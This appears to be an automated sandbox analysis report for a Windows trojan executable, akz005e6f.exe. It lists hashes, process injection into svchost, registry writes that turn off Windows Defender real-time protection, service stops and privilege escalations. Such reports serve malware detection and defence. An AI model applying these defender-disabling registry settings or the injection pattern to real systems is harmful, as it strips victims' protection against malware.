fb68a891eea232c96d386965ada4386a546c7c2e5d1424718d6b27260a310aed

Analysis

max time kernel
1776s
max time network
1786s
platform
windows10_x64
resource
win10v200430
submitted
30-05-2020 08:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

akz005e6f.exe
Size

393KB
MD5

9f644f47c636c47c8908f9e68ff4ad84
SHA1

cf22f9316a701d60251a59416787008f1afca74a
SHA256

fb68a891eea232c96d386965ada4386a546c7c2e5d1424718d6b27260a310aed
SHA512

3018315c5c6c51ce8242b4cfb011f0f14435c019e61bc293d67409a02476bf7f33a2ad9e0b5e0dffb631e332d54be4d564d1313e582da9981c1333c3a48bcafd

Score

10^/10

evasion trojan

Malware Config

Signatures

Suspicious use of WriteProcessMemory 249 IoCs

Processes:

akz005e6f.exeрАПкеЧСыФе.exeрАПкеЧСыФе.exe

description	pid	process	target process
PID 652 wrote to memory of 904	652	akz005e6f.exe	рАПкеЧСыФе.exe
PID 652 wrote to memory of 904	652	akz005e6f.exe	рАПкеЧСыФе.exe
PID 652 wrote to memory of 904	652	akz005e6f.exe	рАПкеЧСыФе.exe
PID 904 wrote to memory of 1036	904	рАПкеЧСыФе.exe	cmd.exe
PID 904 wrote to memory of 1036	904	рАПкеЧСыФе.exe	cmd.exe
PID 904 wrote to memory of 1148	904	рАПкеЧСыФе.exe	cmd.exe
PID 904 wrote to memory of 1148	904	рАПкеЧСыФе.exe	cmd.exe
PID 904 wrote to memory of 1204	904	рАПкеЧСыФе.exe	cmd.exe
PID 904 wrote to memory of 1204	904	рАПкеЧСыФе.exe	cmd.exe
PID 904 wrote to memory of 1240	904	рАПкеЧСыФе.exe	cmd.exe
PID 904 wrote to memory of 1240	904	рАПкеЧСыФе.exe	cmd.exe
PID 904 wrote to memory of 1256	904	рАПкеЧСыФе.exe	cmd.exe
PID 904 wrote to memory of 1256	904	рАПкеЧСыФе.exe	cmd.exe
PID 904 wrote to memory of 1532	904	рАПкеЧСыФе.exe	cmd.exe
PID 904 wrote to memory of 1532	904	рАПкеЧСыФе.exe	cmd.exe
PID 904 wrote to memory of 1592	904	рАПкеЧСыФе.exe	cmd.exe
PID 904 wrote to memory of 1592	904	рАПкеЧСыФе.exe	cmd.exe
PID 904 wrote to memory of 1772	904	рАПкеЧСыФе.exe	cmd.exe
PID 904 wrote to memory of 1772	904	рАПкеЧСыФе.exe	cmd.exe
PID 904 wrote to memory of 1888	904	рАПкеЧСыФе.exe	cmd.exe
PID 904 wrote to memory of 1888	904	рАПкеЧСыФе.exe	cmd.exe
PID 904 wrote to memory of 2072	904	рАПкеЧСыФе.exe	cmd.exe
PID 904 wrote to memory of 2072	904	рАПкеЧСыФе.exe	cmd.exe
PID 904 wrote to memory of 3788	904	рАПкеЧСыФе.exe	cmd.exe
PID 904 wrote to memory of 3788	904	рАПкеЧСыФе.exe	cmd.exe
PID 904 wrote to memory of 3812	904	рАПкеЧСыФе.exe	cmd.exe
PID 904 wrote to memory of 3812	904	рАПкеЧСыФе.exe	cmd.exe
PID 904 wrote to memory of 4692	904	рАПкеЧСыФе.exe	svchost.exe
PID 904 wrote to memory of 4692	904	рАПкеЧСыФе.exe	svchost.exe
PID 904 wrote to memory of 4692	904	рАПкеЧСыФе.exe	svchost.exe
PID 904 wrote to memory of 4692	904	рАПкеЧСыФе.exe	svchost.exe
PID 904 wrote to memory of 4692	904	рАПкеЧСыФе.exe	svchost.exe
PID 904 wrote to memory of 4692	904	рАПкеЧСыФе.exe	svchost.exe
PID 904 wrote to memory of 4692	904	рАПкеЧСыФе.exe	svchost.exe
PID 904 wrote to memory of 4692	904	рАПкеЧСыФе.exe	svchost.exe
PID 904 wrote to memory of 4692	904	рАПкеЧСыФе.exe	svchost.exe
PID 904 wrote to memory of 4692	904	рАПкеЧСыФе.exe	svchost.exe
PID 904 wrote to memory of 4692	904	рАПкеЧСыФе.exe	svchost.exe
PID 904 wrote to memory of 4692	904	рАПкеЧСыФе.exe	svchost.exe
PID 904 wrote to memory of 4692	904	рАПкеЧСыФе.exe	svchost.exe
PID 904 wrote to memory of 4692	904	рАПкеЧСыФе.exe	svchost.exe
PID 904 wrote to memory of 4692	904	рАПкеЧСыФе.exe	svchost.exe
PID 904 wrote to memory of 4692	904	рАПкеЧСыФе.exe	svchost.exe
PID 904 wrote to memory of 4692	904	рАПкеЧСыФе.exe	svchost.exe
PID 1412 wrote to memory of 1104	1412	рАПкеЧСыФе.exe	cmd.exe
PID 1412 wrote to memory of 1104	1412	рАПкеЧСыФе.exe	cmd.exe
PID 1412 wrote to memory of 4020	1412	рАПкеЧСыФе.exe	cmd.exe
PID 1412 wrote to memory of 4020	1412	рАПкеЧСыФе.exe	cmd.exe
PID 1412 wrote to memory of 672	1412	рАПкеЧСыФе.exe	cmd.exe
PID 1412 wrote to memory of 672	1412	рАПкеЧСыФе.exe	cmd.exe
PID 1412 wrote to memory of 3540	1412	рАПкеЧСыФе.exe	cmd.exe
PID 1412 wrote to memory of 3540	1412	рАПкеЧСыФе.exe	cmd.exe
PID 1412 wrote to memory of 4144	1412	рАПкеЧСыФе.exe	cmd.exe
PID 1412 wrote to memory of 4144	1412	рАПкеЧСыФе.exe	cmd.exe
PID 1412 wrote to memory of 4276	1412	рАПкеЧСыФе.exe	cmd.exe
PID 1412 wrote to memory of 4276	1412	рАПкеЧСыФе.exe	cmd.exe
PID 1412 wrote to memory of 4688	1412	рАПкеЧСыФе.exe	cmd.exe
PID 1412 wrote to memory of 4688	1412	рАПкеЧСыФе.exe	cmd.exe
PID 1412 wrote to memory of 4716	1412	рАПкеЧСыФе.exe	cmd.exe
PID 1412 wrote to memory of 4716	1412	рАПкеЧСыФе.exe	cmd.exe
PID 1412 wrote to memory of 1100	1412	рАПкеЧСыФе.exe	cmd.exe
PID 1412 wrote to memory of 1100	1412	рАПкеЧСыФе.exe	cmd.exe
PID 1412 wrote to memory of 4308	1412	рАПкеЧСыФе.exe	cmd.exe
PID 1412 wrote to memory of 4308	1412	рАПкеЧСыФе.exe	cmd.exe

Modifies Windows Defender Real-time Protection settings 3 TTPs 30 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

Processes:

рАПкеЧСыФе.exeрАПкеЧСыФе.exeрАПкеЧСыФе.exeрАПкеЧСыФе.exeрАПкеЧСыФе.exeрАПкеЧСыФе.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	рАПкеЧСыФе.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	рАПкеЧСыФе.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	рАПкеЧСыФе.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	рАПкеЧСыФе.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	рАПкеЧСыФе.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	рАПкеЧСыФе.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	рАПкеЧСыФе.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	рАПкеЧСыФе.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	рАПкеЧСыФе.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	рАПкеЧСыФе.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	рАПкеЧСыФе.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	рАПкеЧСыФе.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	рАПкеЧСыФе.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	рАПкеЧСыФе.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	рАПкеЧСыФе.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	рАПкеЧСыФе.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	рАПкеЧСыФе.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	рАПкеЧСыФе.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	рАПкеЧСыФе.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	рАПкеЧСыФе.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	рАПкеЧСыФе.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	рАПкеЧСыФе.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	рАПкеЧСыФе.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	рАПкеЧСыФе.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	рАПкеЧСыФе.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	рАПкеЧСыФе.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	рАПкеЧСыФе.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	рАПкеЧСыФе.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	рАПкеЧСыФе.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	рАПкеЧСыФе.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Disabling Security Tools
T1089

Service Stop
T1489

Drops file in System32 directory 53 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exesvchost.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe

Executes dropped EXE 6 IoCs

Processes:

рАПкеЧСыФе.exeрАПкеЧСыФе.exeрАПкеЧСыФе.exeрАПкеЧСыФе.exeрАПкеЧСыФе.exeрАПкеЧСыФе.exe

pid	process
904	рАПкеЧСыФе.exe
1412	рАПкеЧСыФе.exe
2728	рАПкеЧСыФе.exe
4316	рАПкеЧСыФе.exe
2084	рАПкеЧСыФе.exe
4216	рАПкеЧСыФе.exe

Suspicious use of AdjustPrivilegeToken 871 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4052	powershell.exe
Token: SeDebugPrivilege	3884	powershell.exe
Token: SeDebugPrivilege	3720	powershell.exe
Token: SeDebugPrivilege	3012	powershell.exe
Token: SeDebugPrivilege	3156	powershell.exe
Token: SeDebugPrivilege	3672	powershell.exe
Token: SeDebugPrivilege	3044	powershell.exe
Token: SeDebugPrivilege	3772	powershell.exe
Token: SeDebugPrivilege	1852	powershell.exe
Token: SeDebugPrivilege	3076	powershell.exe
Token: SeIncreaseQuotaPrivilege	4052	powershell.exe
Token: SeSecurityPrivilege	4052	powershell.exe
Token: SeTakeOwnershipPrivilege	4052	powershell.exe
Token: SeLoadDriverPrivilege	4052	powershell.exe
Token: SeSystemProfilePrivilege	4052	powershell.exe
Token: SeSystemtimePrivilege	4052	powershell.exe
Token: SeProfSingleProcessPrivilege	4052	powershell.exe
Token: SeIncBasePriorityPrivilege	4052	powershell.exe
Token: SeCreatePagefilePrivilege	4052	powershell.exe
Token: SeBackupPrivilege	4052	powershell.exe
Token: SeRestorePrivilege	4052	powershell.exe
Token: SeShutdownPrivilege	4052	powershell.exe
Token: SeDebugPrivilege	4052	powershell.exe
Token: SeSystemEnvironmentPrivilege	4052	powershell.exe
Token: SeRemoteShutdownPrivilege	4052	powershell.exe
Token: SeUndockPrivilege	4052	powershell.exe
Token: SeManageVolumePrivilege	4052	powershell.exe
Token: 33	4052	powershell.exe
Token: 34	4052	powershell.exe
Token: 35	4052	powershell.exe
Token: 36	4052	powershell.exe
Token: SeIncreaseQuotaPrivilege	3884	powershell.exe
Token: SeSecurityPrivilege	3884	powershell.exe
Token: SeTakeOwnershipPrivilege	3884	powershell.exe
Token: SeLoadDriverPrivilege	3884	powershell.exe
Token: SeSystemProfilePrivilege	3884	powershell.exe
Token: SeSystemtimePrivilege	3884	powershell.exe
Token: SeProfSingleProcessPrivilege	3884	powershell.exe
Token: SeIncBasePriorityPrivilege	3884	powershell.exe
Token: SeCreatePagefilePrivilege	3884	powershell.exe
Token: SeBackupPrivilege	3884	powershell.exe
Token: SeRestorePrivilege	3884	powershell.exe
Token: SeShutdownPrivilege	3884	powershell.exe
Token: SeDebugPrivilege	3884	powershell.exe
Token: SeSystemEnvironmentPrivilege	3884	powershell.exe
Token: SeRemoteShutdownPrivilege	3884	powershell.exe
Token: SeUndockPrivilege	3884	powershell.exe
Token: SeManageVolumePrivilege	3884	powershell.exe
Token: 33	3884	powershell.exe
Token: 34	3884	powershell.exe
Token: 35	3884	powershell.exe
Token: 36	3884	powershell.exe
Token: SeIncreaseQuotaPrivilege	3076	powershell.exe
Token: SeSecurityPrivilege	3076	powershell.exe
Token: SeTakeOwnershipPrivilege	3076	powershell.exe
Token: SeLoadDriverPrivilege	3076	powershell.exe
Token: SeSystemProfilePrivilege	3076	powershell.exe
Token: SeSystemtimePrivilege	3076	powershell.exe
Token: SeProfSingleProcessPrivilege	3076	powershell.exe
Token: SeIncBasePriorityPrivilege	3076	powershell.exe
Token: SeCreatePagefilePrivilege	3076	powershell.exe
Token: SeBackupPrivilege	3076	powershell.exe
Token: SeRestorePrivilege	3076	powershell.exe
Token: SeShutdownPrivilege	3076	powershell.exe

Suspicious behavior: EnumeratesProcesses 226 IoCs

Processes:

pid	process
4052	powershell.exe
4052	powershell.exe
3884	powershell.exe
3884	powershell.exe
3884	powershell.exe
4052	powershell.exe
3720	powershell.exe
3720	powershell.exe
3884	powershell.exe
3012	powershell.exe
3012	powershell.exe
3156	powershell.exe
3156	powershell.exe
3672	powershell.exe
3672	powershell.exe
3772	powershell.exe
3772	powershell.exe
1852	powershell.exe
1852	powershell.exe
3076	powershell.exe
3076	powershell.exe
4052	powershell.exe
3672	powershell.exe
3044	powershell.exe
3044	powershell.exe
3076	powershell.exe
3720	powershell.exe
3672	powershell.exe
3076	powershell.exe
3156	powershell.exe
3044	powershell.exe
3720	powershell.exe
1852	powershell.exe
3772	powershell.exe
3012	powershell.exe
3156	powershell.exe
3044	powershell.exe
3772	powershell.exe
3012	powershell.exe
1852	powershell.exe
4444	powershell.exe
4444	powershell.exe
4736	powershell.exe
4736	powershell.exe
3592	powershell.exe
3592	powershell.exe
848	powershell.exe
848	powershell.exe
4192	powershell.exe
4192	powershell.exe
4892	powershell.exe
4892	powershell.exe
4192	powershell.exe
2820	powershell.exe
2820	powershell.exe
3788	powershell.exe
3788	powershell.exe
4892	powershell.exe
4444	powershell.exe
4736	powershell.exe
4944	powershell.exe
4944	powershell.exe
4192	powershell.exe
4892	powershell.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.

Modifies data under HKEY_USERS 2417 IoCs

Processes:

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
